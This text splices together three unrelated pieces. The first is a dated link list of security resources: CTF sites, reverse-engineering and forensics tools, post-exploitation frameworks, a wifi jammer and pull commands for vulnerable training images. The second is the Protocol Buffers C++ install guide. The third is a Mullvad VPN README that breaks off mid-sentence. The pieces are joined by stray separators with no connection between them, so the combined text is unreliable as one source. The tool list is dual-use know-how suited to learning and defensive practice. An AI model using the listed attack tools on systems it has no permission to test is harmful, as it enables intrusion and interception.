* [PhpSploit (⭐2k)](https://github.com/nil0x42/phpsploit) - Full-featured C2 framework which silently persists on webserver via evil PHP oneliner
## [Aug 04, 2020](/content/2020/08/04/README.md)
### Tools / Other
* [Ciphey (⭐14k)](https://github.com/ciphey/ciphey) - Automated decryption tool using artificial intelligence & natural language processing.
## [Jul 31, 2020](/content/2020/07/31/README.md)
### Docker Images for Penetration Testing & Security
* `docker pull vulnerables/web-owasp-nodegoat` - [OWASP NodeGoat (⭐1.7k)](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker)
## [Jun 20, 2020](/content/2020/06/20/README.md)
### Tutorials
* [Begin RE: A Reverse Engineering Tutorial Workshop](https://www.begin.re/the-workshop)
* [Malware Unicorn Reverse Engineering Tutorial](https://malwareunicorn.org/workshops/re101.html#0)
## [May 23, 2020](/content/2020/05/23/README.md)
### Tutorials
* [Shells](https://www.youtube.com/playlist?list=PLyzOVJj3bHQuloKGG59rS43e29ro7I57J)
* [Missing Semester](https://missing.csail.mit.edu/2020/course-shell/)
### Tools
* [Hackers tools](https://www.youtube.com/playlist?list=PLyzOVJj3bHQuiujH1lpn8cA9dsyulbYRv) - Tutorial on tools.
## [Apr 08, 2020](/content/2020/04/08/README.md)
### Tools / Other
* [Scapy (⭐127)](https://github.com/secdev/awesome-scapy) - A Python tool and library for low level packet creation and manipulation
## [Nov 14, 2019](/content/2019/11/14/README.md)
### Tools / Other
* [Spyse](https://spyse.com/) - Data gathering service that collects web info using OSINT. Provided info: IPv4 hosts, domains/whois, ports/banners/protocols, technologies, OS, AS, maintains huge SSL/TLS DB, and more... All the data is stored in its own database allowing get the data without scanning.
* [Findsubdomains](https://findsubdomains.com/) - A subdomains discovery tool that collects all possible subdomains from open source internet and validates them through various tools to provide accurate results.
## [Oct 15, 2019](/content/2019/10/15/README.md)
### Competition / Other
* [HackTheBox](https://www.hackthebox.eu/)
### tools / Other
* [ebowla (⭐707)](https://github.com/Genetic-Malware/Ebowla) - Framework for Making Environmental Keyed Payloads
## [Oct 11, 2019](/content/2019/10/11/README.md)
### Tools / Other
* [IPED - Indexador e Processador de Evidências Digitais](https://servicos.dpf.gov.br/ferramentas/IPED/) - Brazilian Federal Police Tool for Forensic Investigation
## [Oct 07, 2019](/content/2019/10/07/README.md)
### System / Other
* [HackingLab](https://www.hacking-lab.com/)
## [Oct 04, 2019](/content/2019/10/04/README.md)
### Web / Other
* [fuzzy.land](https://fuzzy.land/) - Website by an Austrian group. Lots of challenges taken from CTFs they participated in.
## [Sep 05, 2019](/content/2019/09/05/README.md)
### Tools / Other
* [findsubdomains](https://findsubdomains.com) - really fast subdomains scanning service that has much greater opportunities than simple subs finder(works using OSINT).
* [cirt-fuzzer](http://www.cirt.dk/) - A simple TCP/UDP protocol fuzzer.
* [ASlookup](https://aslookup.com/) - a useful tool for exploring autonomous systems and all related info (CIDR, ASN, Org...)
## [Aug 09, 2019](/content/2019/08/09/README.md)
### tools / Other
* [PowerSploit (⭐11k)](https://github.com/PowerShellMafia/PowerSploit) - A PowerShell post exploitation framework
## [Jun 10, 2019](/content/2019/06/10/README.md)
### Decompilers
* [JD-GUI (⭐13k)](https://github.com/java-decompiler/jd-gui)
* Python
* [uncompyle6 (⭐3.2k)](https://github.com/rocky/python-uncompyle6) - decompiler for the over 20 releases and 20 years of CPython.
### Binary files examination and editing / Hex editors
* [Synalize It](https://www.synalysis.net/)/[Hexinator](https://hexinator.com/) -
### Competition / Other
* [Pico CTF](https://picoctf.com/)
## [Mar 08, 2019](/content/2019/03/08/README.md)
### General / Other
* [Strong node.js (⭐488)](https://github.com/jesusprubio/strong-node) - An exhaustive checklist to assist in the source code security analysis of a node.js web service.
## [Nov 13, 2018](/content/2018/11/13/README.md)
### Tools / Other
* [badtouch (⭐358)](https://github.com/kpcyrd/badtouch) - Scriptable network authentication cracker
* [sniffglue (⭐956)](https://github.com/kpcyrd/sniffglue) - Secure multithreaded packet sniffer
## [Oct 29, 2018](/content/2018/10/29/README.md)
### Bug bounty - Earn Some Money / Other
* [Bugcrowd](https://www.bugcrowd.com/)
* [Hackerone](https://www.hackerone.com/start-hacking)
## [Oct 20, 2018](/content/2018/10/20/README.md)
### Disassemblers and debuggers
* [x64dbg (⭐41k)](https://github.com/x64dbg/x64dbg) - An open-source x64/x32 debugger for Windows
* [Capstone (⭐6.5k)](https://github.com/aquynh/capstone)
### Decompilers
* JVM-based languages
* [Krakatau (⭐1.8k)](https://github.com/Storyyeller/Krakatau) - the best decompiler I have used. Is able to decompile apps written in Scala and Kotlin into Java code. JD-GUI and Luyten have failed to do it fully.
* [procyon](https://bitbucket.org/mstrobel/procyon/wiki/Java%20Decompiler)
* [Luyten (⭐4.8k)](https://github.com/deathmarine/Luyten) - one of the best, though a bit slow, hangs on some binaries and not very well maintained.
* [JAD](http://varaneckas.com/jad/) - JAD Java Decompiler (closed-source, unmaintained)
* [JADX (⭐35k)](https://github.com/skylot/jadx) - a decompiler for Android apps. Not related to JAD.
* .net-based languages
* [dotPeek](https://www.jetbrains.com/decompiler/) - a free-of-charge .NET decompiler from JetBrains
* [ILSpy (⭐18k)](https://github.com/icsharpcode/ILSpy/) - an open-source .NET assembly browser and decompiler
* [dnSpy (⭐24k)](https://github.com/0xd4d/dnSpy) - .NET assembly editor, decompiler, and debugger
* native code
* [Hopper](https://www.hopperapp.com) - A OS X and Linux Disassembler/Decompiler for 32/64-bit Windows/Mac/Linux/iOS executables.
* [cutter](https://github.com/radareorg/cutter) - a decompiler based on radare2.
* [retdec (⭐7.4k)](https://github.com/avast-tl/retdec)
* [snowman (⭐2.3k)](https://github.com/yegord/snowman)
* [Hex-Rays](https://www.hex-rays.com/products/decompiler/)
### Deobfuscators
* [de4dot (⭐6.4k)](https://github.com/0xd4d/de4dot) - .NET deobfuscator and unpacker.
* [JS Beautifier (⭐8.2k)](https://github.com/beautify-web/js-beautify)
* [JS Nice](http://jsnice.org/) - a web service guessing JS variables names and types based on the model derived from open source.
### Other
* [nudge4j (⭐153)](https://github.com/lorenzoongithub/nudge4j) - Java tool to let the browser talk to the JVM
* [dex2jar (⭐11k)](https://github.com/pxb1988/dex2jar) - Tools to work with Android .dex and Java .class files
* [androguard](https://code.google.com/p/androguard/) - Reverse engineering, malware and goodware analysis of Android applications
* [antinet (⭐278)](https://github.com/0xd4d/antinet) - .NET anti-managed debugger and anti-profiler code
* [UPX](http://upx.sourceforge.net/) - the Ultimate Packer (and unpacker) for eXecutables
### Execution logging and tracing
* [Wireshark](https://www.wireshark.org/) - A free and open-source packet analyzer
* [tcpdump](http://www.tcpdump.org/) - A powerful command-line packet analyzer; and libpcap, a portable C/C++ library for network traffic capture
* [mitmproxy (⭐31k)](https://github.com/mitmproxy/mitmproxy) - An interactive, SSL-capable man-in-the-middle proxy for HTTP with a console interface
* [Charles Proxy](https://charlesproxy.com) - A cross-platform GUI web debugging proxy to view intercepted HTTP and HTTPS/SSL live traffic
* [usbmon](https://www.kernel.org/doc/Documentation/usb/usbmon.txt) - USB capture for Linux.
* [USBPcap (⭐786)](https://github.com/desowin/usbpcap) - USB capture for Windows.
* [dynStruct (⭐303)](https://github.com/ampotos/dynStruct) - structures recovery via dynamic instrumentation.
* [drltrace (⭐352)](https://github.com/mxmssh/drltrace) - shared library calls tracing.
### Binary files examination and editing / Hex editors
* [HxD](http://mh-nexus.de/en/hxd/) - A hex editor which, additionally to raw disk editing and modifying of main memory (RAM), handles files of any size
* [WinHex](http://www.winhex.com/winhex/) - A hexadecimal editor, helpful in the realm of computer forensics, data recovery, low-level data processing, and IT security
* [wxHexEditor (⭐488)](https://github.com/EUA/wxHexEditor)
### Binary files examination and editing / Other
* [Binwalk (⭐9.4k)](https://github.com/ReFirmLabs/binwalk) - Detects signatures, unpacks archives, visualizes entropy.
* [Veles (⭐913)](https://github.com/codilime/veles) - a visualizer for statistical properties of blobs.
* [Protobuf inspector (⭐818)](https://github.com/jmendeth/protobuf-inspector)
* [DarunGrim (⭐359)](https://github.com/ohjeongwook/DarunGrim) - executable differ.
* [DBeaver (⭐33k)](https://github.com/dbeaver/dbeaver) - a DB editor.
* [Dependencies (⭐6.6k)](https://github.com/lucasg/Dependencies) - a FOSS replacement to Dependency Walker.
* [PEview](http://wjradburn.com/software/) - A quick and easy way to view the structure and content of 32-bit Portable Executable (PE) and Component Object File Format (COFF) files
* [BinText](https://web.archive.org/web/http://www.mcafee.com/kr/downloads/free-tools/bintext.aspx) - A small, very fast and powerful text extractor that will be of particular interest to programmers.
## [Oct 09, 2018](/content/2018/10/09/README.md)
### tools / Other
* [empire (⭐7k)](https://github.com/EmpireProject/Empire) - A post exploitation framework for powershell and python.
* [silenttrinity (⭐2k)](https://github.com/byt3bl33d3r/SILENTTRINITY) - A post exploitation tool that uses iron python to get past powershell restrictions.
## [Oct 07, 2018](/content/2018/10/07/README.md)
### Docker Images for Penetration Testing & Security
* `docker pull phocean/msf` - [Docker Metasploit](https://hub.docker.com/r/phocean/msf/)
## [Aug 30, 2018](/content/2018/08/30/README.md)
### Tools / Other
* [Nipe (⭐1.6k)](https://github.com/GouveaHeitor/nipe) - A script to make Tor Network your default gateway.
## [Jul 26, 2018](/content/2018/07/26/README.md)
### Tools / Other
* [Amass (⭐9.6k)](https://github.com/OWASP/Amass) - In-depth subdomain enumeration tool that performs scraping, recursive brute forcing, crawling of web archives, name altering and reverse DNS sweeping
## [Jun 25, 2018](/content/2018/06/25/README.md)
### Tools / Other
* [NoSQLMap (⭐2.4k)](https://github.com/codingo/NoSQLMap) - Automated NoSQL database enumeration and web application exploitation tool.
* [VHostScan (⭐1.1k)](https://github.com/codingo/VHostScan) - A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, aliases and dynamic default pages.
* [SubFinder (⭐7.8k)](https://github.com/subfinder/subfinder) - SubFinder is a subdomain discovery tool that discovers valid subdomains for any target using passive online sources.
## [Jun 23, 2018](/content/2018/06/23/README.md)
### Competition / Other
* [ZeroDays CTF](https://zerodays.ie/)
* [Insomni’hack](https://insomnihack.ch/)
## [Jun 15, 2018](/content/2018/06/15/README.md)
### Tools / Other
* [ssh-mitm (⭐1.5k)](https://github.com/jtesta/ssh-mitm) - An SSH/SFTP man-in-the-middle tool that logs interactive sessions and passwords.
## [May 30, 2018](/content/2018/05/30/README.md)
### Web / Other
* [Gruyere](https://google-gruyere.appspot.com/)
* [Others](https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project#tab=On-Line_apps)
## [May 11, 2018](/content/2018/05/11/README.md)
### Tools / Other
* [Autopsy](http://www.sleuthkit.org/autopsy/) - A digital forensics platform and graphical interface to [The Sleuth Kit](http://www.sleuthkit.org/sleuthkit/index.php) and other digital forensics tools
### Bug bounty / Other
* [Awesome bug bounty resources by EdOverflow (⭐5.1k)](https://github.com/EdOverflow/bugbounty-cheatsheet)
### General / Other
* [Movies For Hackers (⭐9.7k)](https://github.com/k4m4/movies-for-hackers) - A curated list of movies every hacker & cyberpunk must watch.
## [May 01, 2018](/content/2018/05/01/README.md)
### Tutorials
* [Understanding the basics of Linux Binary Exploitation (⭐1.2k)](https://github.com/r0hi7/BinExp)
## [Mar 30, 2018](/content/2018/03/30/README.md)
### Web / Other
* [Hack The Box](https://www.hackthebox.eu) - a free site to perform pentesting in a variety of different systems.
## [Oct 22, 2017](/content/2017/10/22/README.md)
### Tools / Other
* [Wifi Jammer](https://n0where.net/wifijammer/) - Free program to jam all wifi clients in range
* [Firesheep](https://codebutler.github.io/firesheep/) - Free program for HTTP session hijacking attacks.
## [Sep 16, 2017](/content/2017/09/16/README.md)
### Tools / Other
* [Habu (⭐803)](https://github.com/portantier/habu) - Python Network Hacking Toolkit
## [May 23, 2017](/content/2017/05/23/README.md)
### General / Other
* [Hack+](http://hack.plus) - An Intelligent network of bots that fetch the latest InfoSec content.
## [Mar 27, 2017](/content/2017/03/27/README.md)
### Tools / Other
* [Paros](http://sourceforge.net/projects/paros/) - A Java-based HTTP/HTTPS proxy for assessing web application vulnerability
* [mitmsocks4j (⭐29)](https://github.com/Akdeniz/mitmsocks4j) - Man-in-the-middle SOCKS Proxy for Java
* [sleuthkit (⭐2.3k)](https://github.com/sleuthkit/sleuthkit) - A library and collection of command-line digital forensics tools
* [EnCase](https://www.guidancesoftware.com/products/Pages/encase-forensic/overview.aspx) - The shared technology within a suite of digital investigations products by Guidance Software
* [xortool (⭐1.2k)](https://github.com/hellman/xortool) - A tool to analyze multi-byte XOR cipher
## [Mar 05, 2017](/content/2017/03/05/README.md)
### General / Other
* [Pentest Cheat Sheets (⭐3.3k)](https://github.com/coreb1t/awesome-pentest-cheat-sheets) - Collection of cheat sheets useful for pentesting
## [Feb 15, 2017](/content/2017/02/15/README.md)
### Online resources / Other
* [Best Linux Penetration Testing Distributions @ CyberPunk](https://n0where.net/best-linux-penetration-testing-distributions/) - Description of main penetration testing distributions
* [Security @ Distrowatch](http://distrowatch.com/search.php?category=Security) - Website dedicated to talking about, reviewing and keeping up to date with open source operating systems
## [Feb 04, 2017](/content/2017/02/04/README.md)
### Disassemblers and debuggers
* [ScratchABit (⭐386)](https://github.com/pfalcon/ScratchABit) - Easily retargetable and hackable interactive disassembler with IDAPython-compatible plugin API
## [Jan 02, 2017](/content/2017/01/02/README.md)
### Docker Images for Penetration Testing & Security
* `docker pull owasp/zap2docker-stable` - [official OWASP ZAP (⭐11k)](https://github.com/zaproxy/zaproxy)
* `docker pull wpscanteam/wpscan` - [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/)
* `docker pull citizenstig/dvwa` - [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/citizenstig/dvwa/)
* `docker pull wpscanteam/vulnerablewordpress` - [Vulnerable WordPress Installation](https://hub.docker.com/r/wpscanteam/vulnerablewordpress/)
* `docker pull hmlio/vaas-cve-2014-6271` - [Vulnerability as a service: Shellshock](https://hub.docker.com/r/hmlio/vaas-cve-2014-6271/)
* `docker pull hmlio/vaas-cve-2014-0160` - [Vulnerability as a service: Heartbleed](https://hub.docker.com/r/hmlio/vaas-cve-2014-0160/)
* `docker pull opendns/security-ninjas` - [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/)
* `docker pull diogomonica/docker-bench-security` - [Docker Bench for Security](https://hub.docker.com/r/diogomonica/docker-bench-security/)
* `docker pull ismisepaul/securityshepherd` - [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/)
* `docker pull danmx/docker-owasp-webgoat` - [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/)
* `docker pull citizenstig/nowasp` - [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/)
* `docker pull bkimminich/juice-shop` - [OWASP Juice Shop (⭐8.4k)](https://github.com/bkimminich/juice-shop#docker-container--)
## [Nov 01, 2016](/content/2016/11/01/README.md)
### General / Other
* [Rookit Arsenal](https://amzn.com/144962636X) - OS RE and rootkit development
## [Jul 03, 2016](/content/2016/07/03/README.md)
### Disassemblers and debuggers
* [plasma (⭐3k)](https://github.com/joelpx/plasma) - Interactive disassembler for x86/ARM/MIPS. Generates indented pseudo-code with colored syntax code.
## [May 14, 2016](/content/2016/05/14/README.md)
### Reverse Engineering / Other
* [Crackmes.de](http://crackmes.de/) - The world first and largest community website for crackmes and reversemes.
## [Mar 13, 2016](/content/2016/03/13/README.md)
### Tools / Other
* [pig (⭐446)](https://github.com/rafael-santiago/pig) - A Linux packet crafting tool
## [Nov 14, 2015](/content/2015/11/14/README.md)
### General
* [Exploit database](https://www.exploit-db.com/) - An ultimate archive of exploits and vulnerable software
### Tools / Other
* [nmap](https://nmap.org/) - Nmap (Network Mapper) is a security scanner
### Web / Other
* [0xf.at](https://0xf.at/) - a website without logins or ads where you can solve password-riddles (so called hackits).
### Competition / Other
* [PHD CTF](http://www.phdays.com/)
### General / Other
* [CTF archives (shell-storm)](http://shell-storm.org/repo/CTF/)
## [Oct 11, 2015](/content/2015/10/11/README.md)
### Disassemblers and debuggers
* [radare2 (⭐18k)](https://github.com/radare/radare2) - A portable reversing framework
## [Dec 17, 2014](/content/2014/12/17/README.md)
### Tutorials
* [Corelan Team's Exploit writing tutorial](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/)
* [Malware Analysis Tutorials: a Reverse Engineering Approach](http://fumalwareanalysis.blogspot.kr/p/malware-analysis-tutorials-reverse.html)
### Tools
* [Metasploit (⭐31k)](https://github.com/rapid7/metasploit-framework) A computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
* [mimikatz (⭐17k)](https://github.com/gentilkiwi/mimikatz) - A little tool to play with Windows security
### Disassemblers and debuggers
* [IDA](https://www.hex-rays.com/products/ida/) - IDA is a Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger
* [OllyDbg](http://www.ollydbg.de/) - A 32-bit assembler level analysing debugger for Windows
### General / Other
* [Open Malware](http://www.offensivecomputing.net/)
* [CTFtime.org](https://ctftime.org/) - All about CTF (Capture The Flag)
* [WeChall](http://www.wechall.net/)
### Tools / Other
* [sqlmap (⭐27k)](https://github.com/sqlmapproject/sqlmap) - Automatic SQL injection and database takeover tool
* [Aircrack-ng](http://www.aircrack-ng.org/) - An 802.11 WEP and WPA-PSK keys cracking program
* [malzilla](http://malzilla.sourceforge.net/) - Malware hunting tool
* [John the Ripper](http://www.openwall.com/john/) - A fast password cracker
* [Aircrack](http://www.aircrack-ng.org/) - Aircrack is 802.11 WEP and WPA-PSK keys cracking program.
### System / Other
* [Exploit Exercises - Nebula](https://exploit-exercises.com/nebula/)
### Reverse Engineering / Other
* [simples.kr](http://simples.kr/) - (Korean)
### Competition / Other
* [hack.lu CTF](http://hack.lu/)
* [Pliad CTF](http://www.plaidctf.com/)
* [RuCTFe](http://ructf.org/e/)
* [Ghost in the Shellcode](http://ghostintheshellcode.com/)
* [SECUINSIDE CTF](http://secuinside.com/)
* [Codegate CTF](http://ctf.codegate.org/html/Main.html?lang=eng)
* [Boston Key Party CTF](http://bostonkeyparty.net/)
### tools / Other
* [SecTools](http://sectools.org/) - Top 125 Network Security Tools
## [Dec 16, 2014](/content/2014/12/16/README.md)
### Tools / Other
* [tools.web-max.ca](http://tools.web-max.ca/encode_decode.php) - base64 base85 md4,5 hash, sha1 hash encoding/decoding
* [NetworkMiner](http://www.netresec.com/?page=NetworkMiner) - A Network Forensic Analysis Tool (NFAT)
* [ZAP](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) - The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications
### System / Other
* [OverTheWire - Semtex](http://overthewire.org/wargames/semtex/)
* [OverTheWire - Vortex](http://overthewire.org/wargames/vortex/)
* [OverTheWire - Drifter](http://overthewire.org/wargames/drifter/)
* [pwnable.kr](http://pwnable.kr/) - Provide various pwn challenges regarding system security
* [SmashTheStack](http://smashthestack.org/)
### Reverse Engineering / Other
* [Reversing.kr](http://www.reversing.kr/) - This site tests your ability to Cracking & Reverse Code Engineering
* [CodeEngn](http://codeengn.com/challenges/) - (Korean)
### Web / Other
* [Hack This Site!](https://www.hackthissite.org/) - a free, safe and legal training ground for hackers to test and expand their hacking skills
* [Webhacking.kr](http://webhacking.kr/)
### Cryptography / Other
* [OverTheWire - Krypton](http://overthewire.org/wargames/krypton/)
### Competition / Other
* [DEF CON](https://legitbs.net/)
* [CSAW CTF](https://ctf.isis.poly.edu/) |
Protocol Buffers - Google's data interchange format
===================================================
Copyright 2008 Google Inc.
https://developers.google.com/protocol-buffers/
C++ Installation - IBM zOS
-----------------------
To build protobuf from source, no additional tools is needed on zOS, build is only relied on make. Just download the latest source with zOS support and do the following:
cd zosbuild
make
make install
make first tries to build zlib which is a dependency of protobuf.
C++ Installation - Unix (Except zOS)
-----------------------
To build protobuf from source, the following tools are needed:
* autoconf
* automake
* libtool
* make
* g++
* unzip
On Ubuntu/Debian, you can install them with:
$ sudo apt-get install autoconf automake libtool curl make g++ unzip
On other platforms, please use the corresponding package managing tool to
install them before proceeding.
To get the source, download one of the release .tar.gz or .zip packages in the
release page:
https://github.com/protocolbuffers/protobuf/releases/latest
For example: if you only need C++, download `protobuf-cpp-[VERSION].tar.gz`; if
you need C++ and Java, download `protobuf-java-[VERSION].tar.gz` (every package
contains C++ source already); if you need C++ and multiple other languages,
download `protobuf-all-[VERSION].tar.gz`.
You can also get the source by "git clone" our git repository. Make sure you
have also cloned the submodules and generated the configure script (skip this
if you are using a release .tar.gz or .zip package):
git clone https://github.com/protocolbuffers/protobuf.git
cd protobuf
git submodule update --init --recursive
./autogen.sh
To build and install the C++ Protocol Buffer runtime and the Protocol
Buffer compiler (protoc) execute the following:
./configure
make
make check
sudo make install
sudo ldconfig # refresh shared library cache.
If "make check" fails, you can still install, but it is likely that
some features of this library will not work correctly on your system.
Proceed at your own risk.
For advanced usage information on configure and make, please refer to the
autoconf documentation:
http://www.gnu.org/software/autoconf/manual/autoconf.html#Running-configure-Scripts
**Hint on install location**
By default, the package will be installed to /usr/local. However,
on many platforms, /usr/local/lib is not part of LD_LIBRARY_PATH.
You can add it, but it may be easier to just install to /usr
instead. To do this, invoke configure as follows:
./configure --prefix=/usr
If you already built the package with a different prefix, make sure
to run "make clean" before building again.
**Compiling dependent packages**
To compile a package that uses Protocol Buffers, you need to pass
various flags to your compiler and linker. As of version 2.2.0,
Protocol Buffers integrates with pkg-config to manage this. If you
have pkg-config installed, then you can invoke it to get a list of
flags like so:
pkg-config --cflags protobuf # print compiler flags
pkg-config --libs protobuf # print linker flags
pkg-config --cflags --libs protobuf # print both
For example:
c++ my_program.cc my_proto.pb.cc `pkg-config --cflags --libs protobuf`
Note that packages written prior to the 2.2.0 release of Protocol
Buffers may not yet integrate with pkg-config to get flags, and may
not pass the correct set of flags to correctly link against
libprotobuf. If the package in question uses autoconf, you can
often fix the problem by invoking its configure script like:
configure CXXFLAGS="$(pkg-config --cflags protobuf)" \
LIBS="$(pkg-config --libs protobuf)"
This will force it to use the correct flags.
If you are writing an autoconf-based package that uses Protocol
Buffers, you should probably use the PKG_CHECK_MODULES macro in your
configure script like:
PKG_CHECK_MODULES([protobuf], [protobuf])
See the pkg-config man page for more info.
If you only want protobuf-lite, substitute "protobuf-lite" in place
of "protobuf" in these examples.
**Note for Mac users**
For a Mac system, Unix tools are not available by default. You will first need
to install Xcode from the Mac AppStore and then run the following command from
a terminal:
sudo xcode-select --install
To install Unix tools, you can install "port" following the instructions at
https://www.macports.org . This will reside in /opt/local/bin/port for most
Mac installations.
sudo /opt/local/bin/port install autoconf automake libtool
Then follow the Unix instructions above.
**Note for cross-compiling**
The makefiles normally invoke the protoc executable that they just
built in order to build tests. When cross-compiling, the protoc
executable may not be executable on the host machine. In this case,
you must build a copy of protoc for the host machine first, then use
the --with-protoc option to tell configure to use it instead. For
example:
./configure --with-protoc=protoc
This will use the installed protoc (found in your $PATH) instead of
trying to execute the one built during the build process. You can
also use an executable that hasn't been installed. For example, if
you built the protobuf package for your host machine in ../host,
you might do:
./configure --with-protoc=../host/src/protoc
Either way, you must make sure that the protoc executable you use
has the same version as the protobuf source code you are trying to
use it with.
**Note for Solaris users**
Solaris 10 x86 has a bug that will make linking fail, complaining
about libstdc++.la being invalid. We have included a work-around
in this package. To use the work-around, run configure as follows:
./configure LDFLAGS=-L$PWD/src/solaris
See src/solaris/libstdc++.la for more info on this bug.
**Note for HP C++ Tru64 users**
To compile invoke configure as follows:
./configure CXXFLAGS="-O -std ansi -ieee -D__USE_STD_IOSTREAM"
Also, you will need to use gmake instead of make.
**Note for AIX users**
Compile using the IBM xlC C++ compiler as follows:
./configure CXX=xlC
Also, you will need to use GNU `make` (`gmake`) instead of AIX `make`.
**Note for zOS users**
please use only the zOS specific section since cmake and configure are not fully available on zOS.
C++ Installation - Windows
--------------------------
If you only need the protoc binary, you can download it from the release
page:
https://github.com/protocolbuffers/protobuf/releases/latest
In the downloads section, download the zip file protoc-$VERSION-win32.zip.
It contains the protoc binary as well as public proto files of protobuf
library.
Protobuf and its dependencies can be installed directly by using `vcpkg`:
>vcpkg install protobuf protobuf:x64-windows
If zlib support is desired, you'll also need to install the zlib feature:
>vcpkg install protobuf[zlib] protobuf[zlib]:x64-windows
See https://github.com/Microsoft/vcpkg for more information.
To build from source using Microsoft Visual C++, see [cmake/README.md](../cmake/README.md).
To build from source using Cygwin or MinGW, follow the Unix installation
instructions, above.
Binary Compatibility Warning
----------------------------
Due to the nature of C++, it is unlikely that any two versions of the
Protocol Buffers C++ runtime libraries will have compatible ABIs.
That is, if you linked an executable against an older version of
libprotobuf, it is unlikely to work with a newer version without
re-compiling. This problem, when it occurs, will normally be detected
immediately on startup of your app. Still, you may want to consider
using static linkage. You can configure this package to install
static libraries only using:
./configure --disable-shared
Usage
-----
The complete documentation for Protocol Buffers is available via the
web at:
https://developers.google.com/protocol-buffers/
|
# Mullvad VPN desktop and mobile app
Welcome to the Mullvad VPN client app source code repository.
This is the VPN client software for the Mullvad VPN service.
For more information about the service, please visit our website,
[mullvad.net](https://mullvad.net) (Also accessible via Tor on our
[onion service](http://o54hon2e2vj6c7m3aqqu6uyece65by3vgoxxhlqlsvkmacw6a7m7kiad.onion/)).
This repository contains all the source code for the
desktop and mobile versions of the app. For desktop this includes the system service/daemon
([`mullvad-daemon`](mullvad-daemon/)), a graphical user interface ([GUI](gui/)) and a
command line interface ([CLI](mullvad-cli/)). The Android app uses the same backing
system service for the tunnel and security but has a dedicated frontend in [android/](android/).
iOS consists of a completely standalone implementation that resides in [ios/](ios/).
## Releases
There are built and signed releases for macOS, Windows, Linux and Android available on
[our website](https://mullvad.net/download/) and on
[Github](https://github.com/mullvad/mullvadvpn-app/releases/). The Android app is also available
on [Google Play] and [F-Droid] and the iOS version on [App Store].
[Google Play]: https://play.google.com/store/apps/details?id=net.mullvad.mullvadvpn
[F-Droid]: https://f-droid.org/packages/net.mullvad.mullvadvpn/
[App Store]: https://apps.apple.com/us/app/mullvad-vpn/id1488466513
You can find our code signing keys as well as instructions for how to cryptographically verify
your download on [Mullvad's Open Source page].
### Platform/OS support
These are the operating systems and their versions that the app officially supports. It might
work on many more versions, but we don't test for those and can't guarantee the quality or
security.
| OS/Platform | Supported versions |
|-------------|--------------------|
| Windows | 10 and 11 |
| macOS | The three latest major releases |
| Linux (Ubuntu)| The two latest LTS releases and the latest non-LTS releases |
| Linux (Fedora) | The versions that are not yet [EOL](https://fedoraproject.org/wiki/End_of_life) |
| Linux (Debian) | 11 and newer |
| Android | 8 and newer |
| iOS | 13 and newer |
On Linux we test using the Gnome desktop environment. The app should, and probably does work
in other DEs, but we don't regularly test those.
## Features
Here is a table containing the features of the app across platforms. This is intended to reflect
the current state of the latest code in git, not necessarily any existing release.
| | Windows | Linux | macOS | Android | iOS |
|-------------------------------|:-------:|:-----:|:-----:|:-------:|:---:|
| OpenVPN | ✓ | ✓ | ✓ | | |
| WireGuard | ✓ | ✓ | ✓ | ✓ | ✓ |
| Quantum-resistant tunnels | ✓ | ✓ | ✓ | ✓ | |
| WireGuard multihop | ✓ | ✓ | ✓ | | |
| WireGuard over TCP | ✓ | ✓ | ✓ | ✓ | |
| OpenVPN over Shadowsocks | ✓ | ✓ | ✓ | | |
| Split tunneling | ✓ | ✓ | | ✓ | |
| Custom DNS server | ✓ | ✓ | ✓ | ✓ | ✓ |
| Content blockers (Ads etc) | ✓ | ✓ | ✓ | ✓ | ✓ |
| Optional local network access | ✓ | ✓ | ✓ | ✓ | ✓\* |
| [Externally audited](./audits)| ✓ | ✓ | ✓ | ✓ | ✓ |
\* The local network is always accessible on iOS with the current implementation
## Security and anonymity
This app is a privacy preserving VPN client. As such it goes to great lengths to stop traffic
leaks. And basically all settings default to the more secure/private option. The user has to
explicitly allow more loose rules if desired. See the [dedicated security document] for details
on what the app blocks and allows, as well as how it does it.
[dedicated security document]: docs/security.md
## Checking out the code
This repository contains submodules needed for building the app. However, some of those submodules
also have further submodules that are quite large and not needed to build the app. So unless
you want the source code for OpenSSL, OpenVPN and a few other projects you should avoid a recursive
clone of the repository. Instead clone the repository normally and then get one level of submodules:
```bash
git clone https://github.com/mullvad/mullvadvpn-app.git
cd mullvadvpn-app
git submodule update --init
```
We sign every commit on the `main` branch as well as our release tags. If you would like to verify
your checkout, you can find our developer keys on [Mullvad's Open Source page].
### Binaries submodule
This repository has a git submodule at `dist-assets/binaries`. This submodule contains binaries and
build scripts for third party code we need to bundle with the app. Such as OpenVPN, Wintun
etc.
This submodule conforms to the same integrity/security standards as this repository. Every merge
commit should be signed. And this main repository should only ever point to a signed merge commit
of the binaries submodule.
See the [binaries submodule's](https://github.com/mullvad/mullvadvpn-app-binaries) README for more
details about that repository.
## Building the app
See the [build instructions](BuildInstructions.md) for help building the app on desktop platforms.
For building the Android app, see the [instructions](./android/BuildInstructions.md) for Android.
For building the iOS app, see the [instructions](./ios/BuildInstructions.md) for iOS.
## Releasing the app
See [this](Release.md) for instructions on how to make a new release.
## Environment variables used by the service
* `TALPID_FIREWALL_DEBUG` - Helps debugging the firewall. Does different things depending on
platform:
* Linux: Set to `"1"` to add packet counters to all firewall rules.
* macOS: Makes rules log the packets they match to the `pflog0` interface.
* Set to `"all"` to add logging to all rules.
* Set to `"pass"` to add logging to rules allowing packets.
* Set to `"drop"` to add logging to rules blocking packets.
* `TALPID_FIREWALL_DONT_SET_SRC_VALID_MARK` - Forces the daemon to not set `src_valid_mark` config
on Linux. The kernel config option is set because otherwise strict reverse path filtering may
prevent relay traffic from reaching the daemon. If `rp_filter` is set to `1` on the interface
